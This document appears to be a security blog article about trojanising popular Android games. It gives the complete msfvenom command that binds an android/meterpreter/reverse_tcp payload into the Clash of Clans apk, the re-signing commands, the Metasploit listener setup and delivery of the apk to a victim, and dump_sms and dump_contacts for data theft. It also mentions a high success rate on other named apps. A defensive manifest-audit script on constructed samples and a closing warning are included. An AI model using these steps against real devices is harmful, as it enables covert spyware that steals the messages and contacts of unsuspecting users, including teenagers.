How Cyber Criminals are Backdooring games like Clash of Clans and PUBG


Introduction
Android device hacking via a malicious app has been around in the wild for a long time. We all know that installing an app from unknown sources will put your device remotely in the hands of a cybercriminal.

In this article, we will demonstrate how cybercriminals attach malware to popular apps. So if you are thinking that paying on the Play Store for a paid app is not worth it, then this article is totally worth reading for you. Let's also keep in mind that most of these games are played by teenagers who may not care what permissions they are granting to these apps or what consequences they will have to deal with, especially if they are using their parents' phone :P

Here we will use MSFvenom to generate a payload and bind it with an existing application, and set up a listener in the Metasploit framework. Once the user/victim downloads and installs the real-world application, the attacker easily gets a session back in Metasploit. The attacker needs to do some social engineering to get the apk installed on the victim's phone.

Introduction to MSFvenom
MSFvenom is a combination of msfpayload and msfencode. These tools are extremely useful for generating payloads in various formats and encoding those payloads with various encoder modules. It standardizes the command line options, speeds things up a bit by using a single framework, and can handle all possible output formats. Here, MSFvenom is used to create a payload and bind it with an existing real-world application in order to compromise the Android device.

Proof of Concept: Target App: Clash of Clans

We need to bind the payload with the apk of Clash of Clans.

Terminal: .\msfvenom.bat -x 'Clash of Clans_com.supercell.clashofclans.apk' -p android/meterpreter/reverse_tcp lhost=192.168.43.86 lport=2222 -o coc.apk

-x = specify a custom executable file (here the original apk) to use as a template
-p = payload to use
lhost = local host that should receive the session once the payload executes
lport = local port on which you want the session
-o = save the payload to a file

Let's talk about what msfvenom is doing in the backend!
  • It generates the payload (android/meterpreter/reverse_tcp), i.e. the malicious application.
  • It decompiles both the payload and the COC apk.
    • For decompiling, it uses apktool.
  • After decompiling, it copies the payload files into the Clash of Clans apk.
  • It injects a hook into the appropriate activity of the COC apk so that our payload will run.
    • The hook is placed so that when the app is launched, the payload is launched with it. To find the right place, it reads the application's AndroidManifest.xml and looks for the <activity> tag whose intent filter contains both of these lines:
    • <action android:name="android.intent.action.MAIN"/>
    • <category android:name="android.intent.category.LAUNCHER"/>
    • The payload hook is then injected into that activity.
  • It writes the permissions the payload needs into the AndroidManifest.xml file.
  • It recompiles the modified apk.
    • Using apktool.
  • It signs the apk.
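The manifest changes described above are also what a defender can look for. As an added example (not part of the original article), the Python script below compares the permissions in an apktool-decoded AndroidManifest.xml against a baseline manifest for the same package, reports the added ones, flags those that back capabilities such as reading SMS and contacts, and lists the MAIN/LAUNCHER activities where a hook would sit. Both manifests are constructed samples, not the real game's manifest.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions that back sensitive capabilities (SMS and contact access among
# them). Illustrative set, not exhaustive.
SENSITIVE = {
    "android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
    "android.permission.SEND_SMS", "android.permission.READ_CONTACTS",
    "android.permission.RECORD_AUDIO", "android.permission.CAMERA",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.READ_CALL_LOG",
    "android.permission.RECEIVE_BOOT_COMPLETED",
}

def permissions(manifest_xml):
    """Set of android:name values from every <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return {e.get(ANDROID_NS + "name") for e in root.iter("uses-permission")}

def launcher_activities(manifest_xml):
    """Activities whose intent filter has both MAIN and LAUNCHER (the hook target)."""
    root = ET.fromstring(manifest_xml)
    found = []
    for act in root.iter("activity"):
        for flt in act.findall("intent-filter"):
            actions = {a.get(ANDROID_NS + "name") for a in flt.findall("action")}
            cats = {c.get(ANDROID_NS + "name") for c in flt.findall("category")}
            if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in cats:
                found.append(act.get(ANDROID_NS + "name"))
    return found

def audit(baseline_xml, suspect_xml):
    """Diff permissions against the baseline and report the launcher activities."""
    added = permissions(suspect_xml) - permissions(baseline_xml)
    return {"added": sorted(added), "added_sensitive": sorted(added & SENSITIVE),
            "launchers": launcher_activities(suspect_xml)}

# Constructed sample manifests (hypothetical package, not a real app).
BASELINE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.game">
<uses-permission android:name="android.permission.INTERNET"/>
<application><activity android:name="com.example.game.GameApp">
<intent-filter><action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/></intent-filter>
</activity></application></manifest>"""

SUSPECT = BASELINE.replace(
    '<uses-permission android:name="android.permission.INTERNET"/>',
    '<uses-permission android:name="android.permission.INTERNET"/>'
    '<uses-permission android:name="android.permission.READ_SMS"/>'
    '<uses-permission android:name="android.permission.READ_CONTACTS"/>'
    '<uses-permission android:name="android.permission.RECORD_AUDIO"/>'
    '<uses-permission android:name="android.permission.VIBRATE"/>')

if __name__ == "__main__":
    print(audit(BASELINE, SUSPECT))
```

On a real apk, run apktool to decode it and feed the resulting AndroidManifest.xml in as the suspect; the baseline is the manifest of a copy obtained from the official store.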


Methods for creating the certificate and private key:
  • Using Android Studio.
  • Msfvenom does this itself while binding the payload into the existing application, by calling jarsigner directly with the Android debug keystore:
    • jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey

Here I'm adding the certificate and private key generated by Android Studio: add certificate.pem and key.pk8, and sign with signapk.jar.

Android requires all apps to be digitally signed with a certificate before they can be installed on the device. Android uses that certificate to identify the author of an app; the certificate does not need to be signed by a certificate authority, and Android apps often use self-signed certificates.
The app developer holds the certificate's private key. signapk takes the input apk followed by the output apk:
Terminal: java -jar signapk.jar certificate.pem key.pk8 coc.apk output.apk
Set up msfconsole for listening:

Terminal: msfconsole
Then load exploit/multi/handler and select the Android payload to listen for incoming clients.

Terminal: set payload android/meterpreter/reverse_tcp
Then set the required options: the listening host (lhost=192.168.43.86) and the listening port (lport=2222), the same values used when the payload was generated.
Then run the exploit and wait for the victim to install and run the application.
Now send the signed application (output.apk) to the victim's device.

Back on the attacker's machine, the multi/handler exploit we started is listening on port 2222 at IP 192.168.43.86, and we get a meterpreter session on the Android device.
Meterpreter offers lots of commands; use the "?" help command to see what else can be done with an Android device.

If we want to get all the SMS stored in the victim’s machine use dump_sms.

If we want to get all the contacts which are in the victim’s machine use dump_contacts.

We have tried the same process on the applications below and got a 95% success rate at backdooring them:
CandyCrush
LudoKing
PhotoGrid


Soon we will release the same demonstration with PUBG, so keep in touch :) Make sure that from today onwards you say NO to apps outside the Play Store, which is the first defence against malware. But as indicated in recent reports, even apps on the Play Store have been found to contain backdoors, so be careful while downloading and using apps: read the comments and check the total downloads before installing, to see what people are saying about the application.
